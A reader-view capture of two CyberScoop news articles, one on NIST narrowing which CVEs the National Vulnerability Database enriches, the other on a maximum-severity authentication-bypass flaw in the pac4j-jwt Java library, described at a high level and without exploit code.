Reading view

There are new articles available, click to refresh the page.

NIST narrows scope of CVE analysis to keep up with rising tide of vulnerabilities

The federal agency tasked with analyzing security vulnerabilities is overwhelmed as it and other authorities struggle to keep pace with a flood of defects that grows every year. The National Institute of Standards and Technology announced Wednesday that it has capitulated to that deluge and narrowed the priorities for its National Vulnerability Database.

NIST said it will only prioritize analysis for CVEs that appear in the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities catalog, software used in the federal government and critical software defined under Executive Order 14028.

The federal agency’s goal with the change is to achieve long-term sustainability and stabilize the NVD program, which has encountered previous challenges, notably a funding lapse in early 2024 that forced NIST to temporarily stop providing key metadata for many vulnerabilities in the database.

The agency still hasn’t cleared a backlog of unenriched CVEs that built up during that pause and grew since then. 

NIST said it analyzed nearly 42,000 vulnerabilities last year, adding that CVE submissions surged 263% from 2020 to 2025. “We don’t expect this trend to let up anytime soon. Submissions during the first three months of 2026 are nearly one-third higher than the same period last year,” the agency said in a blog post announcing the change. 

Indeed, vulnerabilities are increasing across the board. For instance, Microsoft addressed 165 vulnerabilities Tuesday, its second-largest monthly batch of defects on record.

NIST said CVEs that don’t fit its more narrow criteria will still be listed in the NVD, but they won’t be automatically enriched with additional details. 

“This will allow us to focus on CVEs with the greatest potential for widespread impact,” the agency said. “While CVEs that do not meet these criteria may have a significant impact on affected systems, they generally do not present the same level of systemic risk as those in the prioritized categories.”

Researchers and threat hunters who analyze vulnerabilities for CVE Numbering Authorities (CNA) and vendors that publish their own assessments view NIST’s new approach as inevitable.

“They had to do something. NIST was woefully behind on classifying CVEs and would likely never have caught up,” Dustin Childs, head of threat awareness at Trend Micro’s Zero Day Initiative, told CyberScoop.

“I’m not sure if it was a herculean task or a sisyphean one, but either way, they were set up for failure under their previous system. This change allows them to prioritize their work,” he added.

NIST’s new approach will impact the vulnerability research community at large, but also put more private companies and organizations in a position to gain more authority as defenders seek out more alternative sources.

Caitlin Condon, vice president of security research at VulnCheck, previously told CyberScoop that prioritization remains a problem, with too many defenders paying attention to vulnerabilities that aren’t worth their time. 

Of the more than 40,000 newly published vulnerabilities that VulnCheck cataloged last year, only 1% of those defects, just 422, were exploited in the wild

NIST is also trying to reduce other duplicitous efforts with its new approach, effectively leaning even more on CNAs. CVEs that are submitted with a severity rating will no longer receive a separate CVSS score from NIST, the agency said. 

While the agency remains the ultimate authority providing a government-backed catalog of vulnerability assessments, it acknowledged these changes will affect its users.

“This risk-based approach is necessary to manage the current surge in CVE submissions while we work to align our efforts with the needs of the NVD community,” the agency said. “By evolving the NVD to meet today’s challenges, we can ensure that the database remains a reliable, sustainable and publicly available source of information about cybersecurity vulnerabilities.”

The post NIST narrows scope of CVE analysis to keep up with rising tide of vulnerabilities appeared first on CyberScoop.

Critical defect in Java security engine poses serious downstream security risks

A maximum-severity vulnerability in pac4j, an open-source library integrated into hundreds of software packages and repositories, poses a significant security threat, but has thus far received scant attention.

The defect in the Java security engine, which handles authentication across multiple frameworks, has not been exploited in the wild since code review firm CodeAnt AI published a proof-of-concept exploit last week. The company discovered the vulnerability and privately reported it to pac4j’s maintainer, which disclosed the defect and released patches for affected versions of the library within two days.

Some researchers told CyberScoop they are concerned about the vulnerability — CVE-2026-29000 — because it affects a widely deployed Java security engine that attackers can exploit with relative ease.

“A threat actor only needs to access a server’s public RSA key to attempt exploitation,” researchers at Arctic Wolf Labs said in an email. 

These public keys, which are shared openly, are used to encrypt data and enable identity authentication. Attackers can trigger the defect and bypass authentication by forging a JSON Web Token (JWT) or deploy raw JSON claims via JSON Web Encryption (JWE) in pac4j-jwt to break into a system with the highest privileges.

“It is currently too early into the lifecycle of this vulnerability to tell if it will materialize into a major threat but the fact that it is a vulnerability in a library makes it more challenging to assess the potential risk,” researchers at Arctic Wolf Labs said. “Downstream consumers of the library may end up needing to issue their own advisories, as we’ve seen with other similar vulnerabilities in the past.”

Amartya Jha, co-founder and CEO at CodeAnt AI, warned that anyone with basic JWT knowledge can achieve exploitation. The vulnerability is a “logic flaw that no pattern-matching scanner or rule-based static application security testing tool would surface, because there’s no single line of code that’s wrong.”

The downstream security risk, as is often the case with open-source software, is widespread. The authentication module for pac4j is integrated into multiple frameworks, including Spring Security, Play Framework, Vert.x, Javalin and others, Jha said.

Many organizations may not realize they depend on pac4j-jwt because it’s not always declared in build files, he added. CodeAnt said it has contacted hundreds of maintainers in the past week to warn them that their packages and repositories are impacted by the vulnerability, which has a CVSS rating of 10.

Researchers haven’t observed any additional PoC exploit code, but they noted the exploit path is easy to reproduce. 

“The conditions for exploitation are favorable,” Jha said. “It’s pre-authentication, requires no secrets, the PoC is public, and the attack surface includes any internet-facing application or API gateway using the affected configuration. The window between public PoC and patch adoption is where the risk is highest.”

The post Critical defect in Java security engine poses serious downstream security risks appeared first on CyberScoop.

❌